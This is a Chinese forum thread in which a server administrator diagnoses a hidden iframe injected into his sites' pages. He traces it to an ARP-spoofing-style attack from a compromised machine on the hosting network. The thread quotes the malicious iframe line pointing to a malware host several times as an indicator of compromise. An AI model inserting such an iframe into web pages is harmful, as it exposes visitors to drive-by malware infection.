服务器被注入 web.cn3721.org 木马

shuecy

服务器为RH9.0,现发现服务器被注入web.cn3721.org 木马,只要打开此服务器上的网站,杀毒软件就报.
将网站上的页面保存至本地机器后发现html文件中被加入了<iframe src="http://web.cn3721.org/web.htm" height=0 width=0></iframe>,查看服务器上的源文件并没有此段代码.因此判断服务器被注入木马.

请问有没有人中过此木马?由于源文件中并没有此段代码,因此不知如何除掉,
同时请问大家有什么好的杀毒软件吗?请推荐一个
先谢了

cracy

直接使用抓包软件，打开该网页，查看传输数据中有没有包含那段<iframe ……的代码。
1.如果包含，则到服务器上，直接wget 页面，查看有没有相应代码，如果在服务器上直接访问得到的页面中没有包含该代码，那么问题可能在传输过程的环节中被加上了，或者在你的机器中被加上了。 如果是在服务器上每一个文件的源码中都不包含该代码，但是每一个访问获取回来的都有该代码，那么应该检查一下apache的配置文件了。
2.如果没有包含，那么是你的系统有问题

deeperpurple

楼上说的对，一般如果网站主页源文件里没有，就很可能是你系统中的dll文件比较可疑了；

testab

原帖由 deeperpurple 于 2007-4-8 21:11 发表
楼上说的对，一般如果网站主页源文件里没有，就很可能是你系统中的dll文件比较可疑了；

linux系统哪里来的dll文件.

testab

原帖由 shuecy 于 2007-4-6 23:17 发表
服务器为RH9.0,现发现服务器被注入web.cn3721.org 木马,只要打开此服务器上的网站,杀毒软件就报.
将网站上的页面保存至本地机器后发现html文件中被加入了<iframe src="http://web.cn3721.org/web.htm&qu ...

哪个网页有这个代码 就去掉.

shuecy

上述问题已经解决,下面再将详细信息记录如下,希望对后来的人有参考作用.
1. 查过所有页面的源代码中并没有 <iframe src="http://web.cn3721.org/web.htm" height=0 width=0></iframe> 代码. 但是下载html和php页面到本地机器后查看源文件都发现有这段代码.因此怀疑是 apache配置文件的问题,可检查后没有发现任何问题,也没有任何修改的痕迹. 怀疑是系统被注入后门程序,再次在服务器本机上通过 wget 取回页面后也没有发现有这段代码. 因此断定是服务器所在的网络受到攻击,而不是服务器本身受到攻击.  

2. 由于服务器是托管在网通,要确定是否是网络的问题要比查询局域网要难一点. 突然想到 服务器在网通的"邻居"是否正常,试了几个IP,发现有几个地址在用,就一个一个试过去,果然发现了问题. 他们网站的页面打开后也被嵌入这段代码。而那几台机器操作系统都各不相同,有 apache1.3,也有IIS6.0,也有apache2.0的。 不可能这几台机器同时中相同的病毒，最可能的是所在的网络受到了攻击。

到此基本确定是服务器所在的网络有台机器被充当了"肉鸡",被人安装了恶意软件,这个软件监控同一网段内的服务器,所有外出的数据都经过此服务器被加工(嵌入前面所述的代码),加工后的网页就被嵌入了非法代码(那个web.cn3721.org是一个带病毒的网站,建议你不要打开此网站).  这种攻击方式类似于ARP欺骗，具体原理我还没有完全弄清,如果以后有新收获,我会更一步提供有用资料

最后电话通知网通机房此问题才最后解决。

感谢所有的阅读者和回复信息的同仁.

wildlily980

也感谢作者的分享。

jatnet

谢谢分享经验！！

zskff2008

谢谢分享经验

adminzj

哈哈,还有这种技术,让挂网马的人拿一台主机和qq.com放到同一个网段里去,那中木马的人不要太多哦,不要说一个月一辆宝马了,一天一辆宝马都有可能了.

PS:我乱说的,大家表港我.